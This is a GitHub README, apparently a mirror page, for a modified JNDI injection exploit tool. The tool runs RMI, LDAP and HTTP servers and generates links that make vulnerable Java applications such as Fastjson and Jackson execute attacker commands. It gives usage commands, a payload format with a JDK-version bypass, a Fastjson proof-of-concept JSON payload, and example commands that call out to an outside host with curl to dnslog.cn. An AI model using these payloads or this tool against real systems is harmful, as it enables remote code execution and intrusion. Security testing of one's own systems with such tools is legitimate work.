TheKingOfDuck / JNDI-Injection-Exploit

JNDI注入测试工具改版(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

JNDI-Injection-Exploit

修改自JNDI-Injection-Exploit

将原先每执行一次命令需要重新改一下参数改为动态传相关参数。

正常执行流程:

  • java -jar JNDI-Injection-Exploit.jar -A 127.0.0.1 -C "open -a Calculator"
  • sendPayload1:ldap://127.0.0.1:1389/yu2tey
  • java -jar JNDI-Injection-Exploit.jar -A 127.0.0.1 -C "curl www.baidu.com"
  • sendPayload2:ldap://127.0.0.1:1389/lrtrkn

修改后:

  • java -jar JNDI-Injection-Exploit.jar -A 127.0.0.1 -C "open -a Calculator"
  • sendPayload1:ldap://127.0.0.1:1389/yu2tey#7#curl dnslog.cn
  • sendPayload2:ldap://127.0.0.1:1389/yu2tey#8#curl dnslog.cn
  • sendPayload3:ldap://127.0.0.1:1389/yu2tey#8#curl dnslog.cn

Payload格式:

trustURLCodebase is true:

 协议://IP+端口/随便打点字母#jdk版本#命令
 rmi://127.0.0.1:1099/suibianda#7#curl dnslog.cn -H

trustURLCodebase is false:

  协议://IP+端口/bypass#jdk版本#命令
  rmi://127.0.0.1:1099/bypass#7#curl dnslog.cn -H

3

Materials about JNDI Injection

中文文档

相关文章

Description

JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.

Using this tool allows you get JNDI links, you can insert these links into your POC to test vulnerability.

For example, this is a Fastjson vul-poc:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

We can replace "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit to test vulnerability.

Disclaimer

All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.

Usage

Run as

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

where:

  • -C - command executed in the remote classfile.

    (optional , default command is "open /Applications/Calculator.app")

  • -A - the address of your server, maybe an IP address or a domain.

    (optional , default address is the first network interface address)

Points for attention:

  • make sure your server's ports (1099, 1389, 8180) are available .

    or you can change the default port in the run.ServerStart class line 26~28.

  • your command is passed to Runtime.getRuntime().exec() as parameters,

    so you need to ensure your command is workable in method exec().

    Command in bash like "bash -c ...." need to add Double quotes.

Examples

Local demo:

  1. Start the tool like this:

    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

    Screenshot:

    image-20191018154346759

  2. Assume that we inject the JNDI links like rmi://ADDRESS/jfxllc generated in step 1 to a vulnerable application which can be attacked by JNDI injection.

    In this example, it looks like this:

    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }

    then when we run this code, the command will be executed ,

    and the log will be printed in shell:

    image-20191018154515787

Installation

We can select one of the two methods to get the jar.

  1. Download the latest jar from Realease.

  2. Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).

    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    $ cd JNDI-Injection-Exploit
    $ mvn clean package -DskipTests

To do

  • (Done)Combine this project and JNDI-Injection-Bypass to generate workable links when trustURLCodebase is false in higher versions of JDK by default.
  • … ...

About

JNDI注入测试工具改版(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)

License:MIT License


Languages

Language:Java 100.0%